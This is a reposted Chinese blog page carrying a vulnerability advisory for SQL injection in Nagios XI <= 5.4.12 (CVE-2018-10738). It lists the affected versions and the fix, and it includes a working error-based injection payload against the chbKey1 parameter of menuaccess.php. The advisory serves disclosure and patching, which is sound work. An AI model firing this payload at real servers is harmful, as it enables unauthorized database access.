php 5.4.12 漏洞,NagiosXI <= 5.4.12 menuaccess.php SQL injection(CVE-2018-10738)

### NagiosXI <= 5.4.12 menuaccess.php SQL injection(CVE-2018-10738)#### DescriptionA SQL injection issue was discovered in Nagios XI via the admin/menuaccess.php chbKey1parameter.#### Affected Vers

深孵小秘书-红小白

652人浏览 · 2021-03-22 00:54:09

深孵小秘书-红小白 · 2021-03-22 00:54:09 发布

### NagiosXI <= 5.4.12 menuaccess.php SQL injection(CVE-2018-10738)#### DescriptionA SQL injection issue was discovered in Nagios XI via the admin/menuaccess.php chbKey1parameter.#### Affected Version* Nagios XI 5.2.x* Nagios XI 5.4.x before 5.4.13#### Proof of concept“`http://xxxx/nagiosql/admin/menuaccess.phpchbKey1=' or updatexml(2,concat(0x7e,(version())),0) or''#&selSubMenu=1&subSave=1“`![](https://images.seebug.org/1525859270765-w331s)#### FixUpgrade to version 5.4.13

共 0

PoC

暂无 PoC

华为开发者空间

华为开发者空间，是为全球开发者打造的专属开发空间，汇聚了华为优质开发资源及工具，致力于让每一位开发者拥有一台云主机，基于华为根生态开发、创新。

更多推荐